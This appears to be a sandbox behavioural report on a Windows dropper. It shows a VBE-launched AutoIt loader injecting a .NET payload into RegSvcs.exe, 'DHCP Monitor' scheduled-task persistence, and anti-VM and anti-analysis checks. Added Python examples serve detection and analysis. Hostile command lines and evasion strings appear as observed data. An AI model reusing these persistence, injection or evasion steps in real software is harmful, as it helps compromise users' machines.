Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002E25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 7_2_002E25A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0026FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_0026FC8A
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ikvvfncnn.bmp.0.dr Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESD
Source: ikvvfncnn.bmp.0.dr Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Source: boaliim.dat, 00000007.00000003.428295579.000000000182F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424245020.000000000182B000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.000000000182C000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.428339663.0000000001831000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425049143.000000000182E000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516 Thread sleep count: 186 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516 Thread sleep count: 125 > 30 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 8036 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 9709 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 423 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 491 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat API coverage: 5.9 %
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe API call chain: ExitProcess graph end node
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe+
Source: ikvvfncnn.bmp.0.dr Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: ikvvfncnn.bmp.0.dr Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exej
Source: ikvvfncnn.bmp.0.dr Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.427822290.0000000001875000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Q
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then?|
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Qg
Source: ikvvfncnn.bmp.0.dr Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: boaliim.dat, 00000007.00000003.427989410.0000000001824000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424225057.0000000001822000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: RegSvcs.exe, 0000000D.00000002.634072543.0000000001C08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ikvvfncnn.bmp.0.dr Binary or memory string: If ProcessExists("VBoxTray.exe") Then
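The strings above (and the REGSHOT.EXE strings earlier in this section) are fragments of the AutoIt script that boaliim.dat runs: `If ProcessExists("...") Then` probes for VirtualBox and VMware guest tools, two of them guarded by `DriveSpaceFree("d:\") < 1`, plus a `ProcessClose` of Regshot. A practitioner tuning an analysis VM wants to know which of those checks the VM would trip. The following Python is an added example and not part of the report: it reassembles the quoted conditions into a constructed excerpt (the `Exit` and `ProcessClose` bodies are assumed, since the report shows only the conditions), extracts the probed and killed process names, and evaluates the probes against a given process list and free-space map. `DriveSpaceFree` in AutoIt returns megabytes and returns 0 for a drive that does not exist, so the `< 1` guard is effectively testing for an absent or empty D: drive.

```python
import re

# Constructed excerpt reassembling the AutoIt statements quoted in the memory
# strings above; it is not the sample's script. The Exit / ProcessClose bodies
# are assumptions: the report shows only the conditions.
SCRIPT = r'''
If ProcessExists("VboxService.exe") Then Exit
If ProcessExists("VBoxTray.exe") Then Exit
If ProcessExists("VMwaretray.exe") Then Exit
If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then Exit
If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then Exit
If ProcessExists("REGSHOT.EXE") Then
    ProcessClose("REGSHOT.EXE")
EndIf
'''

PROC_EXISTS = re.compile(r'ProcessExists\("([^"]+)"\)', re.I)
DRIVE_FREE = re.compile(r'DriveSpaceFree\("([^"]+)"\)\s*<\s*(\d+)', re.I)
PROC_CLOSE = re.compile(r'ProcessClose\("([^"]+)"\)', re.I)


def extract_checks(script):
    """Return (probes, kills): probes are the process names the script looks
    for, each carrying the DriveSpaceFree guard when one is AND-ed onto the
    same If line; kills are the processes it terminates."""
    probes, kills = [], set()
    for line in script.splitlines():
        for m in PROC_CLOSE.finditer(line):
            kills.add(m.group(1).lower())
        if not line.strip().lower().startswith("if "):
            continue
        drive = DRIVE_FREE.search(line)
        for m in PROC_EXISTS.finditer(line):
            probes.append({
                "process": m.group(1).lower(),
                "drive": drive.group(1).lower() if drive else None,
                "free_lt_mb": int(drive.group(2)) if drive else None,
            })
    return probes, kills


def triggered(probes, running_processes, drive_free_mb):
    """Process names whose check would fire on a machine with the given
    process list and per-drive free space in MB. A drive missing from the
    map is treated as 0 MB, matching AutoIt's DriveSpaceFree failure value."""
    running = {p.lower() for p in running_processes}
    hits = []
    for pr in probes:
        if pr["process"] not in running:
            continue
        if pr["drive"] is not None:
            free = drive_free_mb.get(pr["drive"], 0)
            if not free < pr["free_lt_mb"]:
                continue
        hits.append(pr["process"])
    return hits


if __name__ == "__main__":
    probes, kills = extract_checks(SCRIPT)
    print("probed:", sorted({p["process"] for p in probes}))
    print("killed:", sorted(kills))
    # a stock VirtualBox guest with no D: drive trips two checks
    print("fires on:", triggered(probes, ["explorer.exe", "VBoxService.exe", "VBoxTray.exe"], {}))
```

Renaming the guest-tools processes, or giving the VM a D: volume with free space, is enough to silence the VMware checks; the VirtualBox probes have no drive guard and fire on the process name alone.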
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096E6A3 VirtualQuery,GetSystemInfo, 0_2_0096E6A3
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0095A69B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0096C220
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0097B348 FindFirstFileExA, 0_2_0097B348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_002BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_002BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_002CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_002CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose, 7_2_002C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0028C642 FindFirstFileExW, 7_2_0028C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C7248 FindFirstFileW,FindClose, 7_2_002C7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_002C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_002BDB69
Source: C:\Users\user\Desktop\P05jmXYKpr.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00255D78
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00977DEE mov eax, dword ptr fs:[00000030h] 0_2_00977DEE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00275078 mov eax, dword ptr fs:[00000030h] 7_2_00275078
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0096F838
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0097C030 GetProcessHeap, 0_2_0097C030
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CF3FF BlockInput, 7_2_002CF3FF
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096F9D5 SetUnhandledExceptionFilter, 0_2_0096F9D5
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0096FBCA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00978EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00978EBD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00270D65 SetUnhandledExceptionFilter, 7_2_00270D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_002829B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00270BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00270BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00270FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00270FB1

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\P05jmXYKpr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC0000 Jump to behavior
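The four memory entries above are the evidence behind the "Injects a PE file into a foreign processes" signature: boaliim.dat allocates an execute/read/write region at 0x1100000 inside the dropped RegSvcs.exe, writes a buffer whose first bytes are 4D5A (the MZ header) to that base, and writes a second buffer at 0xFC0000; the .NET payload later unpacked from 0x1100000 is what the obfuscated-method-name entries refer to. The Python below is an added example, not report output, of the correlation a detection engine does over such events: constructed event records modelled on that sequence (with a same-process control that must not alert), an MZ/PE header check that falls back to the MZ magic when only a prefix is visible, and a pass that ties foreign executable allocations to the writes that land in them.

```python
import struct

# Constructed memory-operation events (not sandbox output) modelled on the
# four entries above: boaliim.dat allocates RWX at 0x1100000 inside RegSvcs.exe,
# writes a buffer beginning with 4D5A ("MZ") there, then writes at 0xFC0000.
# The final two events are a control: a process touching its own memory.
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}   # the PAGE_EXECUTE* family


def _fake_pe():
    """A minimal MZ/PE header for the sample event: e_lfanew at 0x3C points at PE\\0\\0."""
    buf = bytearray(0x48)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


EVENTS = [
    {"op": "alloc", "src": "boaliim.dat", "dst": "RegSvcs.exe", "base": 0x1100000,
     "protect": PAGE_EXECUTE_READWRITE},
    {"op": "write", "src": "boaliim.dat", "dst": "RegSvcs.exe", "base": 0x1100000,
     "data": _fake_pe()},
    {"op": "write", "src": "boaliim.dat", "dst": "RegSvcs.exe", "base": 0xFC0000,
     "data": b"\x00\x00\x10\x01"},
    {"op": "alloc", "src": "RegSvcs.exe", "dst": "RegSvcs.exe", "base": 0x400000,
     "protect": PAGE_EXECUTE_READWRITE},
    {"op": "write", "src": "RegSvcs.exe", "dst": "RegSvcs.exe", "base": 0x400000,
     "data": _fake_pe()},
]


def looks_like_pe(data):
    """MZ magic; when enough bytes are present, also the PE signature at e_lfanew.
    A sandbox often reports only the first bytes, so a short MZ prefix counts."""
    if data[:2] != b"MZ":
        return False
    if len(data) < 0x40:
        return True
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def correlate(events):
    """Tie executable allocations in a foreign process to the writes that land
    in them, returning (finding, (source, target), base) tuples."""
    exec_regions = {}          # (src, dst) -> bases allocated with PAGE_EXECUTE*
    findings = []
    for ev in events:
        if ev["src"] == ev["dst"]:
            continue           # same-process operations are ordinary runtime work
        key = (ev["src"], ev["dst"])
        if ev["op"] == "alloc" and ev["protect"] in EXECUTABLE_PROTECTIONS:
            exec_regions.setdefault(key, set()).add(ev["base"])
            findings.append(("foreign_exec_alloc", key, ev["base"]))
        elif ev["op"] == "write":
            findings.append(("foreign_write", key, ev["base"]))
            if looks_like_pe(ev["data"]) and ev["base"] in exec_regions.get(key, ()):
                findings.append(("pe_image_injected", key, ev["base"]))
    return findings


if __name__ == "__main__":
    for finding, (src, dst), base in correlate(EVENTS):
        print(f"{finding:20} {src} -> {dst} @ {base:#x}")
```

The write at 0xFC0000 is reported as a plain foreign write only: it carries no MZ header and targets no region the injector allocated as executable, which matches the report listing it without the "value starts with: 4D5A" qualifier.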
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BBB02 SendInput,keybd_event, 7_2_002BBB02
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp" Jump to behavior
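The process chain just listed, together with the schtasks import under Boot Survival above, is what the Sigma hit "Scheduled temp file as task from temp location" and the "Starts an encoded Visual Basic Script (VBE)" signature key on: wscript.exe runs the .vbe, cmd.exe drops the DHCP lease with ipconfig /release, boaliim.dat (an executable under a .dat name, launched from the RarSFX temp directory with ikvvfncnn.bmp as its argument) is run, and the dropped RegSvcs.exe registers the "DHCP Monitor" tasks from tmp*.tmp XML files in %TEMP%. As an added example that is not part of the report, the Python below runs four such rules over constructed process-creation events (parent image, child image, command line) modelled on that chain; the rule names, the event tuples and the benign control at the end (a task XML imported from ProgramData) are all constructed here.

```python
import ntpath
import re

# Constructed process-creation events (parent image, child image, child command
# line) modelled on the chain in this report; they are not sandbox output. The
# last entry is a benign control: a task XML imported from a normal location.
EVENTS = [
    ("C:\\Users\\user\\Desktop\\P05jmXYKpr.exe",
     "C:\\Windows\\SysWOW64\\wscript.exe",
     '"C:\\Windows\\System32\\wscript.exe" Update-ta.l.vbe'),
    ("C:\\Windows\\SysWOW64\\wscript.exe",
     "C:\\Windows\\SysWOW64\\cmd.exe",
     '"C:\\Windows\\System32\\cmd.exe" /c ipconfig /release'),
    ("C:\\Windows\\SysWOW64\\wscript.exe",
     "C:\\Windows\\SysWOW64\\cmd.exe",
     '"C:\\Windows\\System32\\cmd.exe" /c boaliim.dat ikvvfncnn.bmp'),
    ("C:\\Windows\\SysWOW64\\cmd.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\RarSFX0\\boaliim.dat",
     "boaliim.dat ikvvfncnn.bmp"),
    ("C:\\Users\\user\\AppData\\Local\\Temp\\RegSvcs.exe",
     "C:\\Windows\\SysWOW64\\schtasks.exe",
     '"schtasks.exe" /create /f /tn "DHCP Monitor" /xml '
     '"C:\\Users\\user\\AppData\\Local\\Temp\\tmpE45C.tmp"'),
    ("C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\System32\\schtasks.exe",
     'schtasks /create /tn "Backup" /xml "C:\\ProgramData\\backup\\task.xml"'),
]

TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
PE_EXTENSIONS = (".exe", ".com", ".scr", ".pif")


def _name(path):
    return ntpath.basename(path).lower()


def _in_temp(path):
    lowered = path.lower()
    return any(t in lowered for t in TEMP_DIRS)


def rule_schtasks_xml_from_temp(parent, image, cmdline):
    """schtasks /create importing its task definition from a temp directory."""
    if _name(image) != "schtasks.exe" or "/create" not in cmdline.lower():
        return False
    m = re.search(r'/xml\s+"?([^"\s]+)', cmdline, re.I)
    return bool(m) and _in_temp(m.group(1))


def rule_encoded_script_host(parent, image, cmdline):
    """wscript/cscript started with an encoded script (.vbe/.jse)."""
    return _name(image) in SCRIPT_HOSTS and re.search(r"\.(vbe|jse)\b", cmdline, re.I) is not None


def rule_disguised_extension(parent, image, cmdline):
    """A program run from a temp directory under a non-executable extension."""
    return _in_temp(image) and ntpath.splitext(image)[1].lower() not in PE_EXTENSIONS


def rule_script_host_drops_network(parent, image, cmdline):
    """A script host releasing the DHCP lease before running its payload."""
    return _name(parent) in SCRIPT_HOSTS and re.search(r"ipconfig\s+/release", cmdline, re.I) is not None


RULES = {
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
    "encoded_script_host": rule_encoded_script_host,
    "disguised_extension": rule_disguised_extension,
    "script_host_drops_network": rule_script_host_drops_network,
}


def evaluate(events):
    """Return (rule name, child image name) for every rule an event satisfies."""
    hits = []
    for parent, image, cmdline in events:
        for name, rule in RULES.items():
            if rule(parent, image, cmdline):
                hits.append((name, _name(image)))
    return hits


if __name__ == "__main__":
    for name, image in evaluate(EVENTS):
        print(f"{name:28} {image}")
```

On a real host these rules would be fed from Sysmon event 1 or the 4688 audit log with command-line logging enabled; the temp-directory rule is the one worth keeping permanently, since legitimate software rarely imports task XML from %TEMP% and the ProgramData control stays silent.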
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: select * from antivirusproductf51e8b6/1////83c4/cffd/6
